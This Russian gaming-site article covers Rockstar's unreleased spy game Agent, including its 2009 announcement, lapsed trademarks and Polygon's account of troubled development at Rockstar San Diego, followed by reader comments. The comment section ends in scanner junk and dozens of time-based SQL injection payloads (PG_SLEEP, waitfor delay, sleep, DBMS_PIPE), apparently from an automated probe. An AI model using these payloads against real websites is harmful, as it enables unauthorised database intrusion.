Agent (рус. Агент) — видеоигра в жанре стелс-экшен, разрабатываемая компанией Rockstar North. Игра была анонсирована в 2009 году эксклюзивно для игровой консоли PlayStation 3. По состоянию на 2020 год игра не была выпущена. В 2012 году сайт Eurogamer включил Agent в свой список самых известных игр-vaporware наряду с такими играми, как The Last Guardian или Half-Life 2: Episode Three.
Agent – это видеоигра в стелс жанре разрабатываемая студией Rockstar North только для PS 3.
В июле месяце 2007 года, Sony анонсировала, что Rockstar создает игру которая выйдет только на приставках PS3, в то время название проекта и его приблизительной даты выхода никто не сообщил. Спустя некоторое время, в июне 2009 года, на выставке E3, Sony сообщила название проекта, это “Agent” и другие небольшие подробности.
Rockstar не сообщила других подробностей, кроме того, что действия игры будет происходить в 1970-х годах. Игра связаны со шпионажем.
Хронология событий
- 2007 года, Sony заявили о проекте совместно с Rockstar.
- 2009 год, ходят слухи о том, что проект на грани закрытия.
- В 2011 Take-Two подтверждает о том, что Rockstar продолжает разработку игры Agent.
- В 2013 году Take-Two Interactive регистрирует две торговые марки для игры.
- Сентябрь 2014 года, в сети появляются слухи об отмене игры Agent.
Видео анонса игры
Согласно опубликованному разработчиками анонсу, действие игры разворачивается во время холодной войны — игрок погружается в «мир контрразведки, шпионажа и политических убийств», где ему предоставляется свобода действий. События игры должны были развиваться в конце 1970-х годов. Игра не была выпущена в последующие годы, хотя находилась в активной разработке — в 2011 и 2015 годах в сети появлялись изображения из игры, найденные игровыми журналистами в портфолио бывших работников Rockstar North. В 2013 году Rockstar продлила права на товарный знак Agent, что могло означать, что студия все еще рассчитывала выпустить игру в будущем, однако 23 ноября 2018 года стало известно, что права на торговую марку не были продлены.
Что стало с игрой Agent
Сперва Agent разрабатывала Rockstar San Diego. До 2002 года она была известна как Angel Studios и при издательской поддержке Rockstar выпустила Midnight Club: Street Racing и серию Smuggler’s Run. В 2002-м Take-Two Interactive приобрела Angel Studios и присоединила её к семейству компаний Rockstar Games под названием Rockstar San Diego.
Как рассказывают источники Polygon, до слияния с Rockstar в Angel Studios царила семейная атмосфера: после успешно завершённого этапа производства сотрудникам могли дать внеплановые выходные на один-два дня, а после запуска игры — целый отпуск на недельку-другую. Основатель компании Диего Энджел (Diego Angel) по пятницам и вовсе наливал подчинённым текилу.
Но после объединения верхушка Rockstar решила устроить новичкам тест и предложила им идею для игры: шпионский боевик в открытом мире в духе британского криминального сериала The Professionals и фильмов о Джеймсе Бонде. У игрока должны были быть необычные виды оружия и гаджетов, вроде чемодана, который раскладывается в гоночный карт, или камеры-дрона. Так началась история Agent.
Rockstar ставила San Diego крайне жёсткие условия и рамки. Ради первого прототипа студии пришлось собрать полноценную команду, хотя раньше она работала иначе и наращивала коллектив девелоперов по мере необходимости. Кроме того, San Diego «кранчила» с самого начала производства: по словам одного из собеседников Polygon, Rockstar ожидала, что сотрудники San Diego будут пахать каждый день как можно дольше и станут работать по выходным.
Несмотря на давление, сотрудники San Diego с удовольствием трудились над игрой: она получалась более кинематографичной, чем всё, что делала Rockstar до этого. В итоге для демо собрали целый уровень, где игрока преследовал вертолёт, здания взрывались, ракетные установки вышибали двери, а на крышу Белого дома приходилось десантироваться на дельтаплане.
Как уверяет источник Polygon, демо оказалось крайне качественным и очень походило на готовый уровень из игры. Боссы Rockstar братья Хаузеры (Dan Houser, Sam Houser) были впечатлены увиденным и дали добро на производство проекта.
San Diego хотела разработать для Agent «как минимум три локации», но успела потрудиться только над двумя — открытым миром в Вашингтоне и более линейным Каиром. Команда девелоперов летала в эти города и собирала необходимые материалы. Центр Вашингтона смоделировали полностью.
Трудностей всё больше
Однако San Diego ранее никогда не сталкивалась с таким большим миром, который проектировали для Agent. Потребовались значительные изменения в движке. Тем не менее верхушка Rockstar постоянно поджимала со сроками да ещё и напирала на то, что пора бы и сюжет придумать. К тому моменту San Diego слишком плохо представляла структуру игры, чтобы продуктивно заниматься повествованием. Кранчи не прекращались.
В середине нулевых с короткими промежутками скончалось три человека, тесно связанных с Rockstar San Diego: Майк Хэйнес (Mike Haynes), который на момент смерти числился сотрудником студии, а также Карлос Эрнандес (Carlos Hernandez) и Билл Пёрвис (Bill Purvis) — их не стало уже после расставания с San Diego. Удар оказался настолько тяжёлым, что часть работников студии до сих пор не желает говорить об этом периоде.
Спустя примерно год после работы над Agent из San Diego ушёл продюсер игры Луис Гиглиотти (Luis Gigliotti). Он утянул за собой много других важных членов команды Agent. Настрой в San Diego явно страдал. (Страдал он и у Гиглиотти и его товарищей: они ушли, чтобы возглавить студию Concrete Games под крылом THQ. В её составе они не выпустили ни одной игры, потому что THQ закрыла Concrete Games в 2008-м.)
San Diego расстаётся с Agent
Чтобы справиться со сложностями, Rockstar перекинула на Agent лидеров Red Dead RevolverОбзор игры Red Dead Revolver (она вышла 4 мая 2004-го). Следующий год команда в основном занималась движком и созданием необходимого инструментария, а самой игре уделяла меньше времени. В итоге новые лидеры Agent столкнулись с очередной проблемой: они просто не могли уловить, что хочет увидеть в игре Сэм Хаузер.
В районе 2005 года верхушка Rockstar резко перекинула San Diego с разработки Agent на Red Dead Redemption. Плавных переходов не было: компания просто заявила, мол, собирайте ассеты, которые могут пригодиться, и начинайте делать вестерн. Для некоторых сотрудников рангом пониже новость оказалась шокирующей: они считали, что Agent станет следующим крупным релизом от Rockstar Games.
Технологии, которые спроектировала Rockstar San Diego, со временем превратились в движок RAGE и легли в основу Red Dead RedemptionЧестный обзор на игру Red Dead Redemption — муки с Agent не оказались напрасными.
Отношения с Rockstar у San Diego выходили напряжёнными. В 2006-м два бывших сотрудника от имени всего San Diego начали судебное разбирательство с правлением Rockstar, потому что оно задолжало подразделению зарплаты за переработки на сумму 2.75 миллиона долларов. Rockstar выплатила деньги лишь в ноябре 2008-го. А в январе 2010-го «обеспокоенные жёны работников Rockstar San Diego» написали коллективный блог, где обвинили Rockstar в создании невыносимо тяжёлых трудовых условий. Жёны утверждали, что лютые кранчи в San Diego стартовали в марте 2009-го, то есть аж за год и два месяца до релиза Red Dead Redemption.
Исчезновение Agent
Дальнейшие следы Agent в расследовании Polygon теряются. Во время анонса в 2009 году заявлялось, что игру готовит Rockstar North — создательница серии GTA и Manhunt. Однако в тот же период Rockstar начала распределять работу над одной игрой между несколькими подразделениями, поэтому трудно понять, насколько велика была роль North.
По некоторым сведениям, North взяла ассеты San Diego и сделала свой прототип Agent на другом движке. И новое демо оказалось намного круче версии от San Diego, признаётся один из собеседников Polygon. Другой источник говорит, что Agent передали Rockstar Leeds (GTA: Chinatown Wars, Liberty City Stories и Vice City Stories), а North сосредоточила усилия на GTAV. Ещё два человека заявили, что локации и миссии Agent от North в конце концов интегрировали в GTAV.
Что случилось дальше, непонятно. Официально Take-Two и Rockstar не подтверждали отмену Agent. В течение многих лет Take-Two продлевала права на торговую марку Agent, но в ноябре 2018-го сдалась и забросила её. Вероятнее всего, Agent давно мертва, только сказать об этом публично Rockstar почему-то не хочет (или не может?).
Интересно геймплей бы зырьнуть
Я даже видео не видел игры
гета очен
Так что с проектом уже 2 года не слуху не духу
почему только на ps 3,можно было и на ps4
Ага, ещё бы PS4 в 2007-10 достать.
1
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1
1
1
1
1
1
1
1
1
1
1
555-1) OR 918=(SELECT 918 FROM PG_SLEEP(15))–
555-1)) OR 163=(SELECT 163 FROM PG_SLEEP(15))–
555USTFM2E5′ OR 513=(SELECT 513 FROM PG_SLEEP(15))–
5551ak0SacU’) OR 95=(SELECT 95 FROM PG_SLEEP(15))–
555JD2FpIGA’)) OR 200=(SELECT 200 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
1*if(now()=sysdate(),sleep(15),0)
10’XOR(1*if(now()=sysdate(),sleep(15),0))XOR’Z
10″XOR(1*if(now()=sysdate(),sleep(15),0))XOR”Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
1-1; waitfor delay ‘0:0:15’ —
1-1); waitfor delay ‘0:0:15’ —
1-1 waitfor delay ‘0:0:15’ —
1s9vtvJKC’; waitfor delay ‘0:0:15’ —
1-1 OR 953=(SELECT 953 FROM PG_SLEEP(15))–
1-1) OR 906=(SELECT 906 FROM PG_SLEEP(15))–
1-1)) OR 754=(SELECT 754 FROM PG_SLEEP(15))–
1z9oQmt5d’ OR 645=(SELECT 645 FROM PG_SLEEP(15))–
19VwOafha’) OR 404=(SELECT 404 FROM PG_SLEEP(15))–
1hjkZC11j’)) OR 894=(SELECT 894 FROM PG_SLEEP(15))–
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1′”